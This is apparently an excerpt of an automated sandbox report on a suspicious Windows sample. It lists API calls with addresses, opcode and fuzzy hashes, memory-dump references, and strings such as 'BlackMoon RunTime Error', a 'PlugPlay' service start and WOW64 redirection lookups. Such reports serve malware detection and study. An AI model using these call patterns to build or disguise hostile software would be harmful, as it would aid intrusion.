                                                            • FindFirstFileW.KERNEL32(00000000,00000000,00000000,?,?,?,-00000008,?,?,10003E73,100032CA,100032CA,00000000), ref: 100044FB
                                                            • FindClose.KERNEL32(000000FF,?,?,?,00000000,?,?,?,-00000008,?,?,10003E73,100032CA,100032CA,00000000), ref: 1000467A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 914798566b00441f035ba051605173bed73416e233fc801281549ddca3c80010
                                                            • Instruction ID: 060c4fd64679513acb840d6fc6e9729d614a8cc5c494e6a92ac2eb7959c1ede1
                                                            • Opcode Fuzzy Hash: 914798566b00441f035ba051605173bed73416e233fc801281549ddca3c80010
                                                            • Instruction Fuzzy Hash: 2EC19FF2A802159FFB00CB58DCC1B59B3E5EF59374F290070E94AAB345E679B910DB22
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00401005), ref: 004021A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID: p3@
                                                            • API String ID: 54951025-688362978
                                                            • Opcode ID: cc523d56ca0e04eed82ffbc317aee24857c79cb0ff2e548c6086656d9be38d2b
                                                            • Instruction ID: d8f32012e273c2d09255c5969fce4370cb1db3cbbff92fabde2f972127b6fc72
                                                            • Opcode Fuzzy Hash: cc523d56ca0e04eed82ffbc317aee24857c79cb0ff2e548c6086656d9be38d2b
                                                            • Instruction Fuzzy Hash: 7EE012716005119FE7548B58EF08B673394B784708F059436AF09FB2E5D6B4EC41AFAC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4263d83a6fb9b114440df30be9fa905148a7d7abb542143c69aee057420f8470
                                                            • Instruction ID: 7d018dc995374c8beb202917504abcf43e4cf36f4361c18f222f94921f3b2c82
                                                            • Opcode Fuzzy Hash: 4263d83a6fb9b114440df30be9fa905148a7d7abb542143c69aee057420f8470
                                                            • Instruction Fuzzy Hash: AEF0C236700AA1CFDB61CF08C4E0985B3F5FB086A5B1648A9DA96E7B05C320FD84CB90
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 279913f9ef41144d5051d81dfea20f2865e2895598c92d4de09bad584ae8086b
                                                            • Instruction ID: 7c33662b3792f4924f1db6696261cdd0c80e82523c6732cf9143f3e15128b567
                                                            • Opcode Fuzzy Hash: 279913f9ef41144d5051d81dfea20f2865e2895598c92d4de09bad584ae8086b
                                                            • Instruction Fuzzy Hash: E1E01A71A042089BD724CF49F940755B7ECEB19319F548199AC08D7350E776DE18AB40
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,0051A4D8,00000104), ref: 0040298E
                                                            • strrchr.MSVCRT ref: 0040299F
                                                            • _ftol.MSVCRT ref: 00402ADE
                                                            • GetCommandLineA.KERNEL32 ref: 00402B04
                                                            • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00402B71
                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00402BA3
                                                            • TranslateMessage.USER32(?), ref: 00402BAA
                                                            • DispatchMessageA.USER32(?), ref: 00402BB1
                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00402BC0
                                                            • wsprintfA.USER32 ref: 00402E03
                                                            • MessageBoxA.USER32(00000000,?,blackmoon,00000010), ref: 00402E1A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Message$Peek$CommandDispatchFileLineModuleNameTranslate_ftolstrrchrwsprintf
                                                            • String ID: BlackMoon RunTime Error:%s$ERROR$blackmoon
                                                            • API String ID: 3335176381-532175377
                                                            • Opcode ID: d23094c6b8dd08a06e3e87e423b7288f46e3fee5b05aa7fdb9fea7ccb99972a4
                                                            • Instruction ID: 0ebf552b255fc04f3285025a4bcd52a91cd92520050c2846c0fd30defdc94746
                                                            • Opcode Fuzzy Hash: d23094c6b8dd08a06e3e87e423b7288f46e3fee5b05aa7fdb9fea7ccb99972a4
                                                            • Instruction Fuzzy Hash: B8C1097778450446E7349668FD49BFF7780E7E0322F14003BEB09E62D0D5BF99498AAA
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,1011D618,00000104), ref: 10007FBE
                                                            • strrchr.MSVCRT ref: 10007FCF
                                                            • _ftol.MSVCRT ref: 1000810E
                                                            • GetCommandLineA.KERNEL32 ref: 10008134
                                                            • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 100081A1
                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 100081D3
                                                            • TranslateMessage.USER32(?), ref: 100081DA
                                                            • DispatchMessageA.USER32(?), ref: 100081E1
                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 100081F0
                                                            • wsprintfA.USER32 ref: 10008433
                                                            • MessageBoxA.USER32(00000000,?,blackmoon,00000010), ref: 1000844A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Message$Peek$CommandDispatchFileLineModuleNameTranslate_ftolstrrchrwsprintf
                                                            • String ID: BlackMoon RunTime Error:%s$ERROR$blackmoon
                                                            • API String ID: 3335176381-532175377
                                                            • Opcode ID: 464f9b33ae26adc204916200f947ce6d57aa6c9d0419c51acd7d66140169f28c
                                                            • Instruction ID: 5a52779feb075e5e5f8de5c4930fdfcd2258c2c6b0fc157bcf1c8b8889144296
                                                            • Opcode Fuzzy Hash: 464f9b33ae26adc204916200f947ce6d57aa6c9d0419c51acd7d66140169f28c
                                                            • Instruction Fuzzy Hash: 86C107377849045AF224E234BC41BFF7780E7D13A2F50053AEA49CA195D93FA659CBA2
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?), ref: 00402EB2
                                                            • LoadLibraryA.KERNEL32(?), ref: 00402EC7
                                                            • wsprintfA.USER32 ref: 00402EDE
                                                            • MessageBoxA.USER32(00000000,?,DLL ERROR,00000010), ref: 00402F0E
                                                            • atoi.MSVCRT ref: 00402F4F
                                                            • strchr.MSVCRT ref: 00402F89
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00402FA7
                                                            • wsprintfA.USER32 ref: 00402FBF
                                                            • MessageBoxA.USER32(00000000,?,DLL ERROR,00000010), ref: 00402FF3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Messagewsprintf$AddressHandleLibraryLoadModuleProcatoistrchr
                                                            • String ID: DLL ERROR
                                                            • API String ID: 4054768979-4092134112
                                                            • Opcode ID: 48ab2a0a9ac5e1589756ca42eb6cb6c117fdf1b73a4be72c4a70aa5f95cb928a
                                                            • Instruction ID: 0cfb4f67df2a363defa79e90e97f14d59427b9c76d1182797f87ec457e072499
                                                            • Opcode Fuzzy Hash: 48ab2a0a9ac5e1589756ca42eb6cb6c117fdf1b73a4be72c4a70aa5f95cb928a
                                                            • Instruction Fuzzy Hash: 1A41B2B16043025BD311CF64AD49BAB77E8ABD4754F004839FB05B32D1DBB8D909D7A6
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?), ref: 100084E2
                                                            • LoadLibraryA.KERNEL32(?), ref: 100084F7
                                                            • wsprintfA.USER32 ref: 1000850E
                                                            • MessageBoxA.USER32(00000000,?,DLL ERROR,00000010), ref: 1000853E
                                                            • atoi.MSVCRT ref: 1000857F
                                                            • strchr.MSVCRT ref: 100085B9
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 100085D7
                                                            • wsprintfA.USER32 ref: 100085EF
                                                            • MessageBoxA.USER32(00000000,?,DLL ERROR,00000010), ref: 10008623
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Messagewsprintf$AddressHandleLibraryLoadModuleProcatoistrchr
                                                            • String ID: DLL ERROR
                                                            • API String ID: 4054768979-4092134112
                                                            • Opcode ID: e267e2e34f3d6554566491e95e1fcd580c1cc59d7c4bb7bd795fff90d44ef8b8
                                                            • Instruction ID: 016010be6bfec1d64aa4d024f8b529e765e0c0898d8fad463971b3c3edaceea0
                                                            • Opcode Fuzzy Hash: e267e2e34f3d6554566491e95e1fcd580c1cc59d7c4bb7bd795fff90d44ef8b8
                                                            • Instruction Fuzzy Hash: 9141F3B16043165FE310EF68CC44B9B77E8FB88391F414528FA45C7295EB79EA48C7A2
                                                            APIs
                                                              • Part of subcall function 100031CC: SetProcessWorkingSetSize.KERNEL32(FFFFFFFF,FFFFFFFF,FFFFFFFF), ref: 1000321D
                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000055), ref: 100030B2
                                                            • OpenServiceA.ADVAPI32(00000000,PlugPlay,00000010), ref: 100030F5
                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 10003138
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 10003164
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 10003190
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandleOpen$ManagerProcessSizeStartWorking
                                                            • String ID: PlugPlay
                                                            • API String ID: 2319127234-3541078921
                                                            • Opcode ID: daceb9093349269974e1c07a8bfa4e1bf32c619ee0c85d3626f05c9bc32cb7a2
                                                            • Instruction ID: 81c682b76f79e2cd9689ba80c3bb0d630b65e3f5822c1dcc0957fdb85d5571b8
                                                            • Opcode Fuzzy Hash: daceb9093349269974e1c07a8bfa4e1bf32c619ee0c85d3626f05c9bc32cb7a2
                                                            • Instruction Fuzzy Hash: 7E213974E80308FBFB119FA18C07BADBBB5DF0A781F10C054F2447A195DAB556548F86
                                                            APIs
                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 10005E26
                                                            • OpenServiceA.ADVAPI32(00000000,PlugPlay,00000020), ref: 10005E69
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 10005ED6
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 10005F02
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandleOpen$Manager
                                                            • String ID: PlugPlay
                                                            • API String ID: 4196757001-3541078921
                                                            • Opcode ID: 9b3f4492595582a333c688526a09b6f3c40875835ae68188e763bfb2b96ad9b4
                                                            • Instruction ID: ec70738ddaebdc1d069da535b66b8eadf45ee948ac291279062f0d28817034d0
                                                            • Opcode Fuzzy Hash: 9b3f4492595582a333c688526a09b6f3c40875835ae68188e763bfb2b96ad9b4
                                                            • Instruction Fuzzy Hash: 96415E70E40319ABFB00DFA0CC0BBAEB6B1EB09782F104524F249BA1C4E7B65750CB85
                                                            APIs
                                                            • wsprintfA.USER32 ref: 004022B6
                                                            • wsprintfA.USER32 ref: 004022CD
                                                            • MessageBoxA.USER32(00000000,?,error,00000010), ref: 00402317
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: wsprintf$Message
                                                            • String ID: error$program internal error number is %d. %s
                                                            • API String ID: 386942524-1911117719
                                                            • Opcode ID: 799c2de4ff3b18a02822287b3ff8f7d69b309d28fd5819882cefac32dda4bc91
                                                            • Instruction ID: d7f032a8d1ae83c58ceaae6305cd8c0d924e6b70a515b9bf875525c5a0f8e9d8
                                                            • Opcode Fuzzy Hash: 799c2de4ff3b18a02822287b3ff8f7d69b309d28fd5819882cefac32dda4bc91
                                                            • Instruction Fuzzy Hash: 1521D8716042006FE721DB64DD89FF73798AB95700F44446DE945F32C1E6B8D984C766
                                                            APIs
                                                            • wsprintfA.USER32 ref: 10006E96
                                                            • wsprintfA.USER32 ref: 10006EAD
                                                            • MessageBoxA.USER32(00000000,?,error,00000010), ref: 10006EF7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: wsprintf$Message
                                                            • String ID: error$program internal error number is %d. %s
                                                            • API String ID: 386942524-1911117719
                                                            • Opcode ID: ddd89cf7bec445bb5429a915a7258f498df2d5444f4e4d403e5582ed830ff1ae
                                                            • Instruction ID: 9730d81d3f3093feaa5aeb722518e104f1cf407582e25f7f1f779104f3273181
                                                            • Opcode Fuzzy Hash: ddd89cf7bec445bb5429a915a7258f498df2d5444f4e4d403e5582ed830ff1ae
                                                            • Instruction Fuzzy Hash: 3921C3756043516FF714EB64CC85FE733EAEF89380F454528F88587158D774E9848762
                                                            APIs
                                                            • GetProcessHeap.KERNEL32 ref: 004023D9
                                                            • RtlReAllocateHeap.NTDLL(00770000,00000000,?,?), ref: 004023F6
                                                            • RtlAllocateHeap.NTDLL(00770000,00000008,?), ref: 00402406
                                                            • MessageBoxA.USER32(00000000,0051A058,error,00000010), ref: 0040241F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$Allocate$MessageProcess
                                                            • String ID: error
                                                            • API String ID: 2868346564-1574812785
                                                            • Opcode ID: a771679338a7c21d2ee4bcf65318bff19d58fe8b07f1e24cdcfb72f9824fe4f7
                                                            • Instruction ID: 1bace713bf5b56054257f1b38004d3bbcbf6daa1d7e2208f0d000ab3e948b1e8
                                                            • Opcode Fuzzy Hash: a771679338a7c21d2ee4bcf65318bff19d58fe8b07f1e24cdcfb72f9824fe4f7
                                                            • Instruction Fuzzy Hash: 6DF0BBB5645201BBE61557A0AE0DF6B3754BB98701F00842AFB01F62D0D6B8DC455769
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %I64d$%lf
                                                            • API String ID: 0-1545097854
                                                            • Opcode ID: 8321e38f13f43669a780930a49488fdd4a6d31abcc6d68bd3fdd8f3c4e66b139
                                                            • Instruction ID: 9f9eb006e5482a047416dcd571527f31de44103600a6cc10a61459b0bd497f67
                                                            • Opcode Fuzzy Hash: 8321e38f13f43669a780930a49488fdd4a6d31abcc6d68bd3fdd8f3c4e66b139
                                                            • Instruction Fuzzy Hash: BF51E871A042419BF728E664C881AEF77D4FBC0390F60892DFE4DC2299DA7DE9498353
                                                            APIs
                                                            • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 10007E8A
                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 10007EB4
                                                            • TranslateMessage.USER32(?), ref: 10007EBB
                                                            • DispatchMessageA.USER32(?), ref: 10007EC2
                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10007ED1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Message$Peek$DispatchTranslate
                                                            • String ID:
                                                            • API String ID: 1795658109-0
                                                            • Opcode ID: e5db8f33e6ca6da9ddfc3a3570bb005b84985fed26628e989d8d0ed38ecf677b
                                                            • Instruction ID: 85f8c3f2e147b750515bc2579f163bb578bd77ebae1e1d78a15cc0a3f7598d16
                                                            • Opcode Fuzzy Hash: e5db8f33e6ca6da9ddfc3a3570bb005b84985fed26628e989d8d0ed38ecf677b
                                                            • Instruction Fuzzy Hash: 1701447268035576F220DB54DC82FAB779CEB89B90F500959F740AA0C4D6B4F948C7A6
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100024E3
                                                            • GetProcAddress.KERNEL32(10002BA7,Wow64RevertWow64FsRedirection), ref: 10002517
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 1646373207-1355242751
